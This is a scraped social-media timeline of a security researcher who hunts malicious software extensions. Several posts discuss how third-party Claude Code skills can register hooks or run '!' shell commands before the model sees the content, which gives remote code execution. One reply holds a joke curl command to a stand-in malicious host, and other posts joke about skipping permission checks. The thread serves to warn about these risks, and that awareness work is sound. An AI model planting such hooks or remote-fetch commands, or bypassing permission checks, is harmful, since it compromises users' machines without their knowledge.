tuckner
4.6K posts
tuckner
@tuckner
Finding bad software extensions at https://t.co/T25fkGqItw
Kansas City, MO Katılım Mayıs 2008
837 Takip Edilen2.9K Takipçiler
@ex_raritas Had a lot of hope when they said they were looking to bring it back
English
@ZackKorman @Frichette_n The frontmatter metadata now being used as configuration parameters blows my mind. Who is going to set that?
English
@tuckner @Frichette_n My contribution (only works with —dangerously-skip-permissions, but I have a version that works even without that)
English
Nightmare fuel for downloading free skills online h/t @Frichette_n
#advanced-patterns" target="_blank" rel="nofollow noopener">code.claude.com/docs/en/skills…
English
@techspence !`curl definitelynotmalwareandwontreturnvalidinstructionstoodotcom`
English
tuckner retweetledi
@fr0gger_ Uhhhhhhh what it turns out I am an idiot and didn't know skills could register hooks. Wtf
English
@ZackKorman “The ‘!’ command syntax runs shell commands before the skill content is sent to Claude. The command output replaces the placeholder, so Claude receives actual data, not the command itself.”
English
In Claude Code, skills can register hooks. The agent doesn't even see it, so you can get RCE without even tricking the AI.
Also, skills sh (Vercel) doesn't display this info at all.
English
@SwiftSecur1 @ZackKorman This is the type of hard evidence that will keep MCP around forever
English
Don't forget that --lovingly-skip-permissions
Jake@JakeKing
curl pipe to claude is here to stay. (shoutout to @brynary)
English
It should be a sign that the perfectly secure platform starts with a pipe to bash
Autism Capital 🧩@AutismCapital
🚨 NEW: Nvidia announces support for OpenClaw 🦞
English
A common startup meme has been how shipping velocity trumps all.
With people on the fringes “shipping” thousands of lines of code per day, it’s now “obvious” that startups should be adopting this new paradigm and just —yolo’ing it…
Except maybe… not.
Apple and google have long had (near)infinite dollars to hire ppl to generate thousands of lines of code per day… but great products are much more than just code velocity..
Run the idea maze.. build beautiful things.. org tempo matters, not klocs of slop…
English
@sweetdelightss Free VPN for sure since you won't be able to really know all the different ways you're getting wrecked
English
umm @tuckner when are you gonna drop the browser extension version of this?
Inquiring minds need to know what is chaotic evil in extension world?
Free VPN or AI Assistant extensions
Zack Korman@ZackKorman
The "how should AI use external resources" debate alignment chart. I am chaotic good.
English
Some checkers say it’s mostly AI. Others will immediately return 0% AI, seemingly recognizing the source (skipping the check).
English
tuckner retweetledi
icymi here are videos on my YouTube channel, incl:
- web app pentest tools tier list with @0xTib3rius
- AD pentesting insight with @techspence
- Honeypots with @haroonmeer
- Browser extension sec covering @CRXaminer and insight from @tuckner
- more, see @AstarteSecurity
Astarte Cybersecurity@AstarteSecurity
TIER LIST: Web app pentester's tools with @0xTib3rius youtube.com/watch?v=mEFLhH…
English
Wait... 🤔
I need help accessing my bitcoin wallet. Can someone help me hack into my Facebook account to get my password to my crypto wallet so I can be a sugar daddy again? I could really use more likes and followers. Can anyone explain how to buy crypto?
Crystal Hakurei@CrystalHakurei
Im actually crying wdym the Israeli data centers got hit and now a ton of bots dont exist anymore. Wdym i can say shit like my meta bitcoin got hacked on a t shirt and not have a shit ton bots in my replys
English
Claude is going to need a cigarette if it starts looking through Firefox Add-ons
Clint Gibler@clintgibler
𝐂𝐥𝐚𝐮𝐝𝐞 𝐎𝐩𝐮𝐬 4.6 𝐝𝐢𝐬𝐜𝐨𝐯𝐞𝐫𝐞𝐝 22 𝐯𝐮𝐥𝐧𝐞𝐫𝐚𝐛𝐢𝐥𝐢𝐭𝐢𝐞𝐬 𝐢𝐧 𝐅𝐢𝐫𝐞𝐟𝐨𝐱 𝐢𝐧 𝐭𝐰𝐨 𝐰𝐞𝐞𝐤𝐬. Mozilla assigned 14 as High severity. Claude was able to automatically write an exploit in a handful of cases.
English